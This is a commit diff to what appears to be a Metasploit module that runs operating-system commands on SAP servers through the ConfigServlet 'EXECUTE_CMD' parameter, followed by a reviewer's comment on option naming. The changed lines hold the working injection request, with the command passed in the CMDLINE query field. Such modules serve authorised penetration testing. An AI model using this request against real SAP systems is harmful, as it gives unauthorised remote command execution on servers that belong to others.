improve URI path and parameter handling

switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to prepare query string (instead of
vars_get that escapes the necessary semicolons)
unstable
Andras Kabai 2013-04-19 21:37:39 +02:00
parent c52588f579
commit 85932a2445
1 changed files with 6 additions and 3 deletions


@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet']),
OptBool.new('SSL', [true, 'Use SSL', false])
], self.class)
end
@ -36,10 +36,13 @@ class Metasploit3 < Msf::Auxiliary
def run
begin
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
uri = normalize_uri(target_uri.path, 'ConfigServlet')
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),
'method' => 'GET'
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
})
if !res or res.code != 200
print_error("#{rhost}:#{rport} - Exploit failed.")
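Review bot: The `TARGETURI` option is still described as 'Path to ConfigServlet', but its default is now the parent directory `/ctc/servlet`, and `run` appends `'ConfigServlet'` itself via `normalize_uri(target_uri.path, 'ConfigServlet')`. A value set to the full servlet path, as the description suggests, would produce a doubled `.../ConfigServlet/ConfigServlet` request, and the only feedback is the generic "Exploit failed." message. The description should say what the code expects, for example `OptString.new('TARGETURI', [ true, 'Base path containing ConfigServlet', '/ctc/servlet']),`. As a style point, the new `'query'` line calls `Rex::Text::uri_encode` with `::` where the line it replaces used `Rex::Text.uri_encode`; the dot form is the usual one for method calls. The body of `run` continues past the end of this hunk, so the response handling after `print_error` is not reviewed here.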